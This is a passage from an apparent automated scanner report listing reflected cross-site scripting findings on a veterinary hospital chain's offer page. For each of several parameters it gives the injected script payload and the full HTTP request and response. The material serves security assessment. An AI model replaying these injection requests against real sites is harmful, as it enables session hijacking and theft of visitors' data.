HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:14 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=v41mjjvjtb395bfee89ffekb73; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=6c92a"><script>alert(1)</script>7d4cd1323ce &formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e17...[SNIP]...
2.26. http://www.vcahospitals.com/main/offer [formtype parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d982d"><script>alert(1)</script>197f4942bd8 was submitted in the formtype parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORPd982d"><script>alert(1)</script>197f4942bd8 &guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:20 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=koa2mkuvdq1cjng1duqsnnc194; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORPd982d"><script>alert(1)</script>197f4942bd8 &guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bc...[SNIP]...
2.27. http://www.vcahospitals.com/main/offer [gclid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5d2e"><script>alert(1)</script>46361887d43 was submitted in the gclid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwc5d2e"><script>alert(1)</script>46361887d43 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:04:45 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=6h96hdei9ppruniesbkufjpql5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 10827 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwc5d2e"><script>alert(1)</script>46361887d43 " method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.28. http://www.vcahospitals.com/main/offer [guid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e65"><script>alert(1)</script>2aa17c446a7 was submitted in the guid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284e1e65"><script>alert(1)</script>2aa17c446a7 HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:09 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14517 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284e1e65"><script>alert(1)</script>2aa17c446a7 " method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.29. http://www.vcahospitals.com/main/offer [ipaddress parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cea7b"><script>alert(1)</script>d52b0fd037e was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243cea7b"><script>alert(1)</script>d52b0fd037e &lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:31 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=uefdkgce6dqe7oss7nrn93f4p3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243cea7b"><script>alert(1)</script>d52b0fd037e &lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2...[SNIP]...
2.30. http://www.vcahospitals.com/main/offer [lname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f871"><script>alert(1)</script>0ec73ab7706 was submitted in the lname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=6f871"><script>alert(1)</script>0ec73ab7706 &newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:38 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=if7jtr5gtqf6aveee5163p5q63; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=6f871"><script>alert(1)</script>0ec73ab7706 &newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2...[SNIP]...
2.31. http://www.vcahospitals.com/main/offer [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79ed5"><script>alert(1)</script>092fe4b7483 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw&79ed5"><script>alert(1)</script>092fe4b7483 =1 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:04:55 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=oiivkiojrucik62g0md3t4kjd6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 10833 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw&79ed5"><script>alert(1)</script>092fe4b7483 =1" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.32. http://www.vcahospitals.com/main/offer [newmex parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the newmex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd11"><script>alert(1)</script>bb1f3698051 was submitted in the newmex parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=04cd11"><script>alert(1)</script>bb1f3698051 &optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip